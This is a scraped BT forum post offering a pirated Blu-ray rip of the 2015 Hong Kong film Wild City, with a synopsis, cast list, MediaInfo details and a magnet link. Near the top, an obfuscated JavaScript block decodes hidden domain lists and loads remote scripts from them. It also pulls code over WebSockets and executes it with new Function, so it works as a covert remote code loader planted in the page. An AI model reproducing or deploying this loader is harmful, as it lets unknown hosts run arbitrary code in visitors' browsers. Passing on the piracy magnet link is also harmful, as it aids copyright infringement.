谜城[国粤语音轨/中文字幕]Wild.City.2015.1080p.BluRay.x264.DTS.2Audio-迅雷下载 9.64GB

版主小s 7天前 162

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 谜城 / 迷城 / 暴走迷城 / Wild City

◎年 代 2015

◎产 地 中国大陆 / 中国香港

◎类 别 动作 / 惊悚 / 犯罪

◎语 言 汉语普通话 / 粤语 / 闽南语

◎上映日期 2015-07-30(中国大陆) / 2015-08-20(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt3801934/

◎豆瓣评分 5.6/10 (40353人评价)

◎豆瓣链接 https://movie.douban.com/subject/25837175/

◎片 长 105分钟

◎导 演 林岭东 Ringo Lam (id:1275076)

◎编 剧 林岭东 Ringo Lam (id:1275076)

吕冠南 Koon-Nam Lui (id:1313441)

谭广源 Frankie Tam (id:1328638)

沈诗棋 Shiqi Shen (id:1328717)

◎演 员 古天乐 Louis Koo (id:1027577)

余文乐 Shawn Yue (id:1041510)

佟丽娅 Liya Tong (id:1275756)

张孝全 Joseph Chang (id:1014743)

谢天华 Michael Tse (id:1010833)

元秋 Qiu Yuen (id:1304876)

李灿森 Sam Lee (id:1028522)

伍允龙 Philip Ng (id:1316267)

姜皓文 Philip Keung Ho-Man (id:1317884)

林子善 Chi-Sing Lam (id:1314861)

任达华 Simon Yam (id:1031194)

高捷 Jack Kao (id:1276076)

马浴柯 Marc Ma (id:1327671)

谭炳文 Ping-Man Tam (id:1317676)

李静仪 Heidi Lee (id:1343968)

郑恕峰 Shu Fung Cheng (id:1371985)

李宗彥 Jason Li (id:1411001)

马溱禧 Heily Ma (id:1383508)

罗子乔 Bella Law (id:1341434)

黄翠仪 Wong Chui Yee (id:1378627)

霍永富 Marcus Fox (id:1445546)

林岭东 Ringo Lam (id:1275076)

张兆康 Ahong Cheung (id:1366935)

蔡彦菁 Maggie Choy (id:1426247)

黄伟辉 Wong Wai-Fai (id:1275163)

黄志明 Wong Chi-Ming (id:1398895)

◎标 签 犯罪 / 香港 / 古天乐 / 动作 / 香港电影 / 余文乐 / 2015 / 林岭东

◎简 介

前警官天民(古天乐 饰)在纸醉金迷的香港城开着一家小酒吧,这夜,大陆女孩小云(佟丽娅 饰)在酒吧里孤身一人,愁容满面地喝闷酒。打烊之后,醉得不省人事的小云无法开车,无奈之下天民把她送往自己干妈家中休息。翌日,小云在天民和他弟弟少聪(余文乐 饰)的陪伴下去取车——一辆价值不菲的玛莎拉蒂,她发现车钥匙不见了,却不敢回家取。天民感觉到小云隐瞒着不少秘密,而少聪似乎被小云吸引,愿意帮忙。但就在他们取车的时候,一群亡命之徒冲出把小云抓走。兄弟俩和歹徒们激战,小云伺机逃跑。事发之后,天民酒吧被黑帮骚扰,少聪的士也被恶意破坏,甚至还遭到台湾黑帮的疯狂砍杀。两人渐渐地意识到自己已被卷入了涉及巨额黑金的斗争之中,只能奋力一战。

本片为香港导演林岭东在阔别影坛7年之后的复出之作。

  1. General

  2. Unique ID : 5901590909200804732921248604493780728 (0x4709AE58CCE19E77C1C63266D1D16F8)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.64 GiB

  7. Duration : 1 h 41 min

  8. Overall bit rate : 13.6 Mb/s

  9. Movie name : Wild City 2015

  10. Encoded date : UTC 2021-07-19 07:48:47

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 41 min

  25. Bit rate : 10.5 Mb/s

  26. Width : 1 920 pixels

  27. Height : 816 pixels

  28. Display aspect ratio : 2.35:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.279

  36. Stream size : 7.44 GiB (77%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 1 h 41 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 536 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 16 bits

  54. Compression mode : Lossy

  55. Stream size : 1.09 GiB (11%)

  56. Title : Cantonese

  57. Language : Chinese

  58. Default : Yes

  59. Forced : No


  60. Audio #2

  61. ID : 3

  62. Format : DTS

  63. Format/Info : Digital Theater Systems

  64. Codec ID : A_DTS

  65. Duration : 1 h 41 min

  66. Bit rate mode : Constant

  67. Bit rate : 1 536 kb/s

  68. Channel(s) : 6 channels

  69. Channel layout : C L R Ls Rs LFE

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 93.750 FPS (512 SPF)

  72. Bit depth : 16 bits

  73. Compression mode : Lossy

  74. Stream size : 1.09 GiB (11%)

  75. Title : Mandarin

  76. Language : Chinese

  77. Default : No

  78. Forced : No


  79. Text #1

  80. ID : 4

  81. ID in the original source medium : 4609 (0x1201)

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 36 min

  87. Bit rate : 20.3 kb/s

  88. Count of elements : 2190

  89. Stream size : 14.0 MiB (0%)

  90. Title : chs

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No

  94. Original source medium : Blu-ray


  95. Text #2

  96. ID : 5

  97. ID in the original source medium : 4608 (0x1200)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 36 min

  103. Bit rate : 21.7 kb/s

  104. Count of elements : 2190

  105. Stream size : 15.0 MiB (0%)

  106. Title : cht

  107. Language : Chinese

  108. Default : No

  109. Forced : No

  110. Original source medium : Blu-ray


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4610 (0x1202)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 36 min

  119. Bit rate : 20.5 kb/s

  120. Count of elements : 2190

  121. Stream size : 14.1 MiB (0%)

  122. Language : English

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Menu

  127. 00:00:00.000 : Chapter 01

  128. 00:03:42.166 : Chapter 02

  129. 00:07:02.958 : Chapter 03

  130. 00:12:26.958 : Chapter 04

  131. 00:15:30.958 : Chapter 05

  132. 00:21:14.791 : Chapter 06

  133. 00:27:29.625 : Chapter 07

  134. 00:31:21.125 : Chapter 08

  135. 00:37:05.500 : Chapter 09

  136. 00:42:22.208 : Chapter 10

  137. 00:45:56.750 : Chapter 11

  138. 00:50:27.208 : Chapter 12

  139. 00:55:28.500 : Chapter 13

  140. 00:59:45.666 : Chapter 14

  141. 01:02:47.875 : Chapter 15

  142. 01:06:48.583 : Chapter 16

  143. 01:11:03.458 : Chapter 17

  144. 01:18:24.541 : Chapter 18

  145. 01:23:44.375 : Chapter 19

  146. 01:33:38.750 : Chapter 20


TAGS 动作 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:D7B1E807D5B54EDCF6BAEAEA97648D544A5F1013
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回